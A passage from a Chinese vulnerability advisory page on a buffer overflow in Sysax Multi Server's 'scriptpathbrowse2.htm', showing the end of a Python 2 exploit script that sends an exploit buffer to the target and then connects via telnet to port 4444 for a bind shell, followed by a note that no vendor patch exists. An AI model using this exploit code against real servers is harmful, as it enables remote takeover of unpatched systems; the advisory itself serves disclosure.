Sysax Multi Server 'scriptpathbrowse2.htm'缓冲区溢出漏洞(2)

try:
    r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    r.connect((target, port))
    print "[+] Sending pwnag3"
    r.send(exploit)
  except Exception, e:
    print "[-] There was a problem"
    print e
  time.sleep(2)
  print "[+] Here is your shell..."
  subprocess.Popen("telnet localhost 4444", shell=True).wait()
  sys.exit(1)

if __name__ == '__main__':
  if len(sys.argv) != 1:
    print "[-] Usage: %s"
    sys.exit(1)
 
  #by default it binds to 127.0.0.1 on 88
  target = "127.0.0.1"
  port = 88
  main()
  exploit()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Codeorigin
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwysgf.html